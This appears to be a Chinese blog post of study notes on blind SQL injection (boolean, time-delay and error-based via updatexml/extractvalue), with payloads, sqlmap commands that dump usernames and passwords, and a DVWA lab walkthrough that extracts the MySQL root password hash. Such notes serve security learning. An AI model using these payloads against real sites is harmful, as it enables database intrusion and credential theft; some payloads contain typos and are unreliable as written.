sql注入之盲注总结

最新推荐文章于 2024-07-31 19:38:21 发布
最新推荐文章于 2024-07-31 19:38:21 发布
阅读量281 收藏 2
点赞数 1
分类专栏: # SQL注入基础 文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dyjkl/article/details/132852612
版权

死在山野的风里,活在自由的梦里

sql注入之盲注总结


盲注就是在注入的过程中,获取的数据不能显示到前端页面,此时,我们需要利用一些方法进行判断或者尝试,我们称之为盲注。我们可以知道盲注分为以下三类:

布尔 - 逻辑判断

用于页面中不会显示数据库信息,只显示对与错的内容

比如输入“1”,提示“存在用户”,不能使用联合注入,要用burp的重放器

1.获取数据库名

id=1'and if(length(database())>1,1,0)--+

把database())>1改成database())>4,发现返回错误,就可以确定数据库名字长度为4

id=1'and if(substring(database(),1,1)='a',1,0)--+

database(),1,1)=‘a’,1,0) 改成 database(),&1&,1)=‘&a&’,1,0) 得到库名

2.获取表名

id=1'and if(substring((select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=database() limit 1)1,1)='a',1,0--+

limit 1)1,1)=‘a’,1,0–+ 改成 limit 1)&1&,1)=‘&a&’,1,0–+ 得到第一个表

limit 1)&1&,1)=‘&a&’,1,0–+ 改成 limit 1,1)&1&,1)=‘&a&’,1,0–+ 得到第二个表

3.获取表的内容

id=1'and if(substring((select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME='users' and TABLE_SCHEMA=database() limit 0,1)1,1)='a',1,0--+

limit 0,1)1,1)=‘a’,1,0–+ 改成 limit 0,1)&1&,1)=‘&a&’,1,0–+ 得到第一个列

limit 0,1)&1&,1)=‘&a&’,1,0–+ 改成 limit 1,1)&1&,1)=‘&a&’,1,0–+ 得到第二个列

4.获取账号密码

id=1'and if(substring((select CONCAT(user,0x3a,PASSWORD) from users limit 0,1)1,1)='a',1,0--+

limit 0,1)1,1)=‘a’,1,0 改成 limit 0,1)&1&,1)=‘&a&’,1,0 得到账号密码

时间 - 延时判断

用Windows OS' and 1=1#     Windows OS' and 1=2#     页面都正常
用  Windows OS' and sleep(2)#                   页面延迟2s返回

注入时,需要用命令,不要用软件,软件太慢

test.txt是在注入登录成功的同时用burp得到的数据包

//查数据库名
sqlmap -r test.txt --current -db

在这里插入图片描述

//查数据库clover里面的表
sqlmap -r test.txt -D 'clover' -tables

在这里插入图片描述

//查数据库clover里面的表users的内容
sqlmap -r test.txt -D 'clover' -T 'users' -columns

在这里插入图片描述

//查看username和password的信息
sqlmap -r test.txt -D 'clover' -T 'users' -C 'username,password'dump

在这里插入图片描述

报错 - 报错回显(强制性报错 )

原理是利用两个函数,第二个参数如果不是xpath格式,是sql语句就会报错

updatexml():从目标XML中更改包含所查询值的字符串

第一个参数:XML_document 是String格式,为XML文档对象的名称,文中为DOC

第二个参数:XPath_string(Xpath格式字符串)

第三个参数:new_value,String格式,替换查找到的符合条件的数据

updatexml(XML_document,XPath_String,new_value);
'or updatexml(1,concat(0x7e,database()),0)or'

extractvalue():从目标XML中返回包含所查询值的字符串

第一个参数:XML_document 是String格式,为XML文档对象的名称,文中为DOC

第二个参数:XPath_String (Xpath格式字符串,Xpath是一种查找语法)

extractvalue(XML_document,XPath_String)
' or extractvalue(1,concat(0x7e,database())) or'
' union select 1,extractvalue(1,concat(0x7e,(select version())))%23

以DWVA靶场为例

1.获取数据库名

id=1'and info()--+

页面显示“FUNCTION dvwa.info 不存在”,数据库名字是dvwa

2.查看当前用户

id=1'and (updatexml(1,concat(0x7e,(select user()),0x7e),1))--+

页面显示“ XPATH 语法错误:‘root@localhost’ “,当前用户为root

3.获取当前账号的密码

id=1' and (authentication_string from mysql.user limit 1)--+

id=1' and (updatexml(1,concat(0x7e,(select(select authentication_string from mysql.user limit 1)),0x7e),1))--+

用authentication只能查前32个字母

页面显示 " XPATH 语法错误:‘~*6BB4837EB74329105EE4568DDA7DC6’ "

id=1'and (updatexml(1,concat(0x7e,(select(substring((select
authentication_string from mysql.user limit 1),32,40))),0x7e),1))--+

页面显示 " XPATH 语法错误:‘7ED2CA2AD9’ ",得到后半部分的密码

小阿宁的猫猫
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
SQL注入手动盲注案例
05-30
### SQL注入手动盲注案例详解 #### 一、SQL注入概念 SQL注入是一种常见的Web应用程序安全漏洞,攻击者可以通过在应用程序的输入字段中插入恶意SQL语句来操纵或窃取数据库中的信息。手动盲注是一种高级技巧,适用于...
确认并利用 SQL 盲注漏洞
2301_77324496的博客
11-04 114
在服务器端,sql 注入sql 盲注是同类型的漏洞,都是因为对输入内容不检测或检查不充分导致脏数据进入了数据库中。我们这个语的意思是猜测第一个字母是不是同样的,我们把该请求发送到intruder 模块,将a设置为改变参数。1. 这个表单和上面的 sql 注入表单(SQL Injection)一模一样,输入1可以查看id为1的用户信息。15.我们的载荷列表是a-z,1-9,所合。20.下面继续猜解后面的字符。最后我们测试出来的结果是 dvwa@%,最后一个%匹配的是空字符,所以用户名是 dvwa@
SQL Injection (Blind)之盲注(原理、分类、利用)
Innocence_0的博客
03-06 1379
SQL注入过程中,SQL语句执行后,选择的数据不能回显到前端页面,此时需要利用一些方法进行判断或者尝试,这个过程称之为盲注。在盲注中,攻击者根据其返回页面的不同来判断信息(可能是页面内容的不同,也可以是响 应时间不同)。一般情况下,盲注可分为两类:基于布尔的盲注(Boolean based)基于时间盲注(Time based)
sql注入总结(时间盲注,布尔盲注,无列名注入,regexp盲注,order by注入,二次注入,update注入,报错注入)
2202_75361164的博客
10-28 1118
sql注入总结(时间盲注,布尔盲注,无列名注入,regexp盲注,order by注入,二次注入,update注入,报错注入)
超硬核,SQL注入时间盲注,原理+步骤+实战思路
2401_84296945的博客
04-30 666
提示:sleep的时间可以自定义,时间太长效率太低、时间太短则不容易判断。
时间盲注(ctfhub)
2401_82985722的博客
03-29 1146
(布尔盲注直接使用length进行筛选:按照length从高到低排序 前面四个即为结果,按照payload1的顺序进行排序得到数据库sqli。(已经知道长度为4,可以直接设置为4,不知道时 设置比需要爆破字符的长度长。(5)点击开始攻击得到结果,sleep(5)要筛选出响应时间大于5s的数据包。condition为条件,条件为真时返回true,条件为假时返回false。再进行筛选,响应时间最大的四个就是执行成功的——sqli。# -D 指定库,-T指定表,-C 指定列(字段)(爆破字段为26个英文字母)
SQL注入之基于布尔的盲注详解
09-10
布尔型SQL注入是一种特殊的SQL注入方式,它发生在服务器对用户输入的数据进行响应时,并不会返回完整的数据库信息,而是仅返回“真”(True)或“假”(False)的反馈。这种方式使得攻击者需要根据系统对正确或错误...
网络安全-实验七-SQL注入-盲注+sqlmap使用.docx
11-10
总结,这个实验展示了SQL注入盲注的原理和应用,以及sqlmap的强大功能。了解和掌握这些技术对于防御和检测SQL注入攻击至关重要。同时,我们应当意识到,安全防护不仅仅是技术问题,合理的编程习惯和充分的输入验证...
sql注入讲解ppt.pptx
08-10
SQL 注入基础知识点总结 SQL 注入是指 web 应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在 web 应用程序中事先定义好的查询语句的结尾上添加额外的 SQL 语句,在管理员不知情的情况下实现非法...
SQL 注入天书.pdf
08-06
SQL注入是一种常见的网络安全漏洞,发生在应用程序使用用户输入的SQL代码直接构建数据库查询时。当攻击者能够通过输入恶意SQL语句来控制或篡改数据库查询,他们就能获取敏感信息、修改数据甚至完全控制系统。《SQL...
sql的执行流程
qq_59395271的博客
07-24 1074
执行过程分成两层,一层是server层,主要进行连接服务,和分析语句,执行sql具体流程是 首先与用户通过连接器建立连接,然后将sql查询语句在查询缓存中查找,如果查找处理过相同的语句将,直接返回数据,给连接器,进而返回给用户,如果没有查到,则将sql语句发送给解析器,解析器中有词法分析和语法分析,通过这两个分析过程,创建对应的sql语法树,然后执行sql查询语句流程,首先经过预处理,优化器,执行计划,最后通过执行器,建立和存储引擎的连接。
简单的 mongoDB 学习
qq_19342829的博客
07-31 356
mongodb入门学习整理
社区养老服务小程序的设计
最新发布
Karen198的博客
07-31 294
管理员账户功能包括:系统首页,个人中心,用户管理,服务人员管理,服务产品管理,服务预约管理,服务状态管理,服务退订管理,活动管理,视频管理。主要技术:Java,Spring,mybatis,mysql,jquery,html。服务器:SpringBoot自带 apache tomcat。微信端账号功能包括:系统首页,服务产品,活动,视频,我的。JDK版本:Java JDK1.8。数据库可视化工具: navicat。数据库版本: mysql5.7。开发工具:IDEA(推荐)开发系统:Windows。
二进制部署k8s集群之master节点和etcd数据库集群(上)
zx52306的博客
07-30 941
【代码】二进制部署k8s集群之master节点和etcd数据库集群(上)
【iOS】——持久化
m0_73974920的博客
07-30 1029
因为plist文件不能够保存自定义对象。如果一个字典中保存有自定义对象,如果把这个对象写入到文件当中,它是不会生成 plist文件的。如果对象是NSString、NSDictionary、NSArray、NSData、NSNumber等类型,可以直接用NSKeyedArchiver进行归档和恢复。
已经10岁的K8S,在很多方面仍需努力
u012516914的专栏
07-28 337
/ K8S 已经 10 岁了,但仍然有许多方面要继续努力 /Kubernetes 于 2014 年 6 月推出,自那时起,它在推广云原生应用设计和支持更多微服务部署方面发挥了巨大作用。容器部署的增长非常迅速,而 Kubernetes 对于企业管理这些部署至关重要——根据 CNCF 上一份报告的调查结果,84% 的组织正在使用或评估 Kubernetes,而 66% 的潜在和实际消费者在生产中使用 ...
MySQL-数据操作语言
一直走的很慢的鸭子
07-27 711
DML英文全称是Data Manipulation Language(数据操作语言),用来对数据库中表的数据记录进行增删改操作。
手把手教你安装AoiAWD
swordcloud_xm的博客
07-29 1318
AoiAWD 是一个由Aodzip(安恒信息 海特实验室研究员、HAC战队成员)维护的一个针对于CTF AWD模式的开源项目。专为比赛设计,便携性好,低权限运行的EDR系统。任何人都可以在 GNU AGPL-3.0 许可下使用该项目和分享该项目的源码。AoiAWD地址:https://github.com/DasSecurity-HatLab/AoiAWD。
添加索引导致微服务异常
07-29 1133
执行DDL时,最好使用ONLINE选项,随着oracle版本升级,online状态下可执行的DDL逐步增加,大部分普通DDL上,可以使用ONLINE选项,例如。而在新增索引的时候会有TM锁,而该表又有大量的insert、update等,因此会对这些dml语句造成阻塞。1、对大表新增索引尽量停业务,就算加上online不会造成阻塞,但对性能也有影响,特别是这种性能敏感的系统。2、在新增索引的时候加online参数,而online产生的TM锁时间比较短。加了online后,可以以非独占的方式创建和删除索引。
sql注入union盲注
07-28
- *1* [SQL注入盲注简单总结](https://blog.csdn.net/qq_42477007/article/details/96492174)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小阿宁的猫猫

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值